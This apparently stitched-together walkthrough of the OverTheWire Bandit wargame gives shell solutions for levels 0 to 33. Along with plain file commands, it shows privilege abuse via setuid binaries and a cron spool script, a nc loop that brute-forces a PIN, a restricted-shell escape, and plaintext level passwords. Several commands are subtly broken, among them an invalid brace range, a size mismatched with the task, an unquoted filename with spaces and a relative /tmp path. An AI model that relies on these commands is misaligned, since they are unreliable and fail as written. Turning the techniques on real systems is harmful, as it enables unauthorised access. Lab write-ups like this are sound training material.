Over The wire (Bandit)

Over the wire - bandit :

Level 0:

To get to level 0 we need to simply SSH into Bandit with the username: bandit0 and password: bandit0

Level 0 -> 1:

The password for the next level is stored in a file called readme located in the home directory. bandit0@melinda:~$ cat readme

Level 1 -> 2:

The password for the next level is stored in a file called - located in the home directory bandit1@melinda:~$ cat ./-

Level 2 -> 3:

The password for the next level is stored in a file called spaces in this filename located in the home directory bandit1@melinda:~$ cat spaces in this filename

Level 3 -> 4:

The password for the next level is stored in a hidden file in the inhere directory. bandit3@melinda:~/inhere$ cat .hidden

Level 4 - >5:

The password for the next level is stored in the only human-readable file in the inhere directory. Tip: if your terminal is messed up, try the “reset” command.

bandit4@melinda:~/inhere$ file ./-*

Level 5 -> 6:

The password for the next level is stored in a file somewhere under the inhere directory and has all of the following properties: - human-readable - 1033 bytes in size - not executable

bandit5@melinda:~/inhere$ find -type f -size 1033c

Level 6 -> 7:

The password for the next level is stored somewhere on the server and has all of the following properties: - owned by user bandit7 - owned by group bandit6 - 33 bytes in size

bandit6@melinda:~$ find / -user bandit7 -group bandit6 -size 32c 2>/dev/null

Level 7 -> 8:

The password for the next level is stored in the file data.txt next to the word millionth

bandit7@melinda:~$ awk '/^millionth/ {print $2;}' data.txt

Level 8 -> 9:

The password for the next level is stored in the file data.txt and is the only line of text that occurs only once

bandit8@melinda:~$ cat data.txt | sort | uniq -u

Level 9 -> 10:

The password for the next level is stored in the file data.txt in one of the few human-readable strings, beginning with several ‘=’ characters.

bandit9@melinda:~$ strings data.txt | grep "="

Level 10 -> 11

The password for the next level is stored in the file data.txt, which contains base64 encoded data

bandit10@melinda:~$ echo VGhlIHBhc3N3b3JkIGlzIElGdWt3S0dzRlc4TU9xM0lSRnFyeEUxaHhUTkViVVBSCg== | base64 --decode

Level 11 -> 12:

The password for the next level is stored in the file data.txt, where all lowercase (a-z) and uppercase (A-Z) letters have been rotated by 13 positions

bandit11@melinda:~$ echo Gur cnffjbeq vf 5Gr8L4qetPEsPk8htqjhRK8XSP6x2RHh | tr [a-zA-Z] [n-za-mN-ZA-M]

Level 12 -> 13:

The password for the next level is stored in the file data.txt, which is a hexdump of a file that has been repeatedly compressed. For this level it may be useful to create a directory under /tmp in which you can work using mkdir. For example: mkdir /tmp/myname123. Then copy the data file using cp, and rename it using mv (read the manpages!)

bandit12@melinda:~$ mkdir /tmp/jhalon bandit12@melinda:~$

xxd -r data.txt > /tmp/jhalon/file.bin bandit12@melinda:/tmp/jhalon$ file file.bin

bandit12@melinda:/tmp/jhalon$ file file.bin file.bin: gzip compressed data, was "data2.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression bandit12@melinda:/tmp/jhalon$ zcat file.bin | file - /dev/stdin: bzip2 compressed data, block size = 900k bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | file - /dev/stdin: gzip compressed data, was "data4.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | file - /dev/stdin: POSIX tar archive (GNU) bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | tar xO | file - /dev/stdin: POSIX tar archive (GNU) bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | tar xO | tar xO | file - /dev/stdin: bzip2 compressed data, block size = 900k bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | tar xO | tar xO | bzcat | file - /dev/stdin: POSIX tar archive (GNU) bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | tar xO | tar xO | bzcat | tar xO | file - /dev/stdin: gzip compressed data, was "data9.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | tar xO | tar xO | bzcat | tar xO | zcat | file - /dev/stdin: ASCII text

bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | tar xO | tar xO | bzcat | tar xO | zcat The password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL

bandit12@melinda:/tmp$ rm -rf jhalon

Level 13 -> 14:

The password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14. For this level, you don’t get the next password, but you get a private SSH key that can be used to log into the next level. Note: localhost is a hostname that refers to the machine you are working on

bandit13@melinda:~$ ssh -i sshkey.private bandit14@localhost

Level 14 -> 15:

The password for the next level can be retrieved by submitting the password of the current level to port 30000 on localhost.

bandit14@melinda:~$ telnet localhost 30000

Level 15 -> 16:

The password for the next level can be retrieved by submitting the password of the current level to port 30001 on localhost using SSL encryption.

Helpful note: Getting “HEARTBEATING” and “Read R BLOCK”? Use -ign_eof and read the “CONNECTED COMMANDS” section in the manpage. Next to ‘R’ and ‘Q’, the ‘B’ command also works in this version of that command… bandit15@melinda:~$

openssl s_client -ign_eof -connect localhost:30001

Level 16 -> 17:

The credentials for the next level can be retrieved by submitting the password of the current level to a port on localhost in the range 31000 to 32000. First find out which of these ports have a server listening on them. Then find out which of those speak SSL and which don’t. There is only 1 server that will give the next credentials, the others will simply send back to you whatever you send to it.

bandit16@melinda:~$ nmap -p 31000-32000 -sV localhost bandit16@melinda:~$

echo cluFn7wTiGryunymYOu4RcffSxQluehd | openssl s_client -quiet -connect localhost:31790

Great! So let’s copy the RSA Key (Don’t forget to get the Header and Footer) and create a new file in a tmp directory.

bandit16@melinda:/tmp/jhalon$ nano sshkey.private bandit16@melinda:/tmp/jhalon$ chmod 600 sshkey.private bandit16@melinda:/tmp/jhalon$ ssh -i ./sshkey.private bandit17@localhost

Level 17 -> 18:

There are 2 files in the homedirectory: passwords.old and passwords.new. The password for the next level is in passwords.new and is the only line that has been changed between passwords.old and passwords.new

bandit17@melinda:~$ diff passwords.new passwords.old

Level 18 -> 19:

The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH.

root@kali:~# ssh bandit18@bandit.labs.overthewire.org "bash --norc"

Level 19 -> 20:

To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used to setuid binary.

bandit19@melinda:~$ ./bandit20-do bandit19@melinda:~$ ./bandit20-do cat /etc/bandit_pass/bandit20

Level 20 -> 21:

There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).

NOTE: To beat this level, you need to login twice: once to run the setuid command, and once to start a network daemon to which the setuid will connect.

NOTE 2: Try connecting to your own network daemon to see if it works as you think

bandit20@melinda:~$ nc -l 32123 < /etc/bandit_pass/bandit20 bandit20@melinda:~$ ./suconnect 32123

Level 21 -> 22:

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

bandit21@melinda:~$ cd /etc/cron.d/ bandit21@melinda:/etc/cron.d$ cat cronjob_bandit22 bandit21@melinda:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

Level 22 -> 23:

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.

bandit22@melinda:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1 bandit22@melinda:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349

Level 23 -> 24:

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

bandit23@melinda:/etc/cron.d$ cat cronjob_bandit24 bandit23@melinda:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh bandit23@melinda:/etc/cron.d$ mkdir /tmp/jhalon bandit23@melinda:/tmp/jhalon$ nano

#!/bin/bash
cat /etc/bandit_pass/bandit24 > tmp/jhalon/pass

bandit23@melinda:/tmp/jhalon$ cp script.sh /var/spool/bandit24 bandit23@melinda:/tmp/jhalon$ cat /tmp/jhalon/pass

Level 24 -> 25:

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

bandit24@melinda:~$ mkdir /tmp/jhalon bandit24@melinda:~$ cd /tmp/jhalon bandit24@melinda:/tmp/jhalon$ nano

#!/bin/bash
passwd="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"
for a in {0-10000}
do
echo $passwd' '$a | nc localhost 30002 >> result &
done

bandit24@melinda:/tmp/jhalon$ chmod 755 script.sh bandit24@melinda:/tmp/jhalon$ ./script.sh bandit24@melinda:/tmp/jhalon$ sort result | uniq -u

Level 25 -> 26:

Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.

bandit25@melinda:~$ cat /etc/passwd | grep bandit26 bandit25@melinda:~$ cat /usr/bin/showtext bandit25@melinda:~$ ssh -i bandit26.sshkey bandit26@localhost :r /etc/bandit_pass/bandit26 Enter

3rd jan

over the wire bandit walkthrough

Level 26-27

On this level, we are not given any hints. We are on our own on this. So, we like to see what we have to work upon in the current directory. We ran ls command to find a script bandit27-do. Let’s execute the script to see if we get any message or hint. It does one better, it gives us an example. This script basically runs the command it is given as user bandit27. So now that we can run commands as user bandit27. Let’s read the password file located at /etc/bandit_pass/bandit27. Now that we have the password for the next level, we will login as bandit27 using SSH.

ls ./bandit27-do ./bandit27-do whoami ./bandit27-do cat /etc/bandit_pass/bandit27 ssh bandit27@localhost

Level 27-28

On this level, we are informed that there is a git repository and the password for that repository is the same password that was used to login in as user bandit27. We are required to clone the repository. Now we need to have the write permission to clone a repository. So, we create a directory in the tmp directory. After cloning let’s list all the file in the repo. We find a README file. Upon reading that file we get the password for the next level.

mkdir /tmp/pavan4 cd /tmp/pavan4 git clone ssh://bandit27-git@localhost/home/bandit27-git/repo ls cd repo ls cat README

Level 28-29

On this level, we are informed that there is a git repository and the password for that repository is the same password that was used to login in as user bandit28. We are required to clone the repository. Now we need to have the write permission to clone a repository. So, we create a directory in the tmp directory. After cloning let’s list all the file in the repo. We find a README file. Upon reading that file we see that password is hidden.

mkdir /tmp/pavan5 cd /tmp/pavan5 git clone ssh://bandit28-git@localhost/home/bandit28-git/repo ls cd repo/ ls cat README.md

Maybe the password was inside the file but was removed. Good thing is that whenever a change is made in a git, a log entry is created. Let’s check that log, we can see that the author of git has made the latest commit named ‘fix info leak’. We need to check out this commit.

git show

Level 29-30

On this level, we are informed that there is a git repository and the password for that repository is the same password that was used to login in as user bandit29. We are required to clone the repository. Now we need to have the write permission to clone a repository. So, we create a directory in the tmp directory. Now we will clone the repository inside this directory.

mkdir /tmp/pavan6 cd /tmp/pavan6 git clone ssh://bandit29-git@localhost/home/bandit29-git/repo

ls cd repo/ ls cat README.md

git branch -a git checkout dev cat README.md ssh bandit30@localhost

Level 30-31

On this level, we are informed that there is a git repository and the password for that repository is the same password that was used to login in as user bandit30. We are required to clone the repository. Now we need to have the write permission to clone a repository. So, we create a directory in the tmp directory. Now we will clone the repository inside this directory.

mkdir /tmp/pavan7 cd /tmp/pavan7 git clone ssh://bandit30-git@localhost/home/bandit30-git/repo

After cloning let’s list all the file in the repo. We find a README file. Here we are told that it is an empty file. Now it’s time to enumerate this git. Git has the ability to tag specific points in a repository’s history as being important. We can enumerate that tag. On looking carefully, we find the tag secret. On reading that tag we find the password we were looking for on this level. Now that we have the password for the next level, we will login as bandit31 using SSH.

ls cd repo ls cat README.md git tag git show secret ssh bandit31@localhost

Level 31-32

On this level, we are informed that there is a git repository and the password for that repository is the same password that was used to login in as user bandit31. We are required to clone the repository. Now we need to have the write permission to clone a repository. So, we create a directory in the tmp directory. Now we will clone the repository inside this directory.

mkdir /tmp/pavan8 cd /tmp/pavan8 git clone ssh://bandit31-git@localhost/home/bandit31-git/repo

Now we add the file to the repository and commit to that entry. And finally, push it into the origin branch. This step requires the password for the current user. As we can see in the given image that we have the password for the next level.

git add -f key.txt git commit -m "." git push origin

Level 32-33

On reaching this level, we are greeted with a message “Welcome to the Uppercase shell”. To understand what it does, we ran ls command but we got an error. On close inspection of the error message, we understand that it states that the LS command is not found. It means that the shell converts my commands to Uppercase before executing. For this level, we are given a hint “it’s time for another escape”. This made us curious about escape characters. Upon brief research, we found that we can bypass this uppercase shell using an escape character ‘$0’. We were right. We got the bash. Let’s list all files using ls -al command. We see that the owner of uppercase is bandit33. So, we can access the /etc/bandit_pass/bandit33 file to get the password for the next level. After getting the password, we will login as bandit33 using SSH.

ls $0 ls -al cat /etc/bandit_pass/bandit33 ssh bandit33@localhost

Level 33

This is the final level for now as the bandit team is working on creating more levels. We connected to this level as use bandit33. After connecting we run ls command to see the list of files we have in the current directory. We see that we have a README file. On opening that file, we see the final flag and a brief message from the Over the Wire Team. This concludes this series for now. We will solve more levels as soon as Over the Wire team publishes more levels.

ls cat README.txt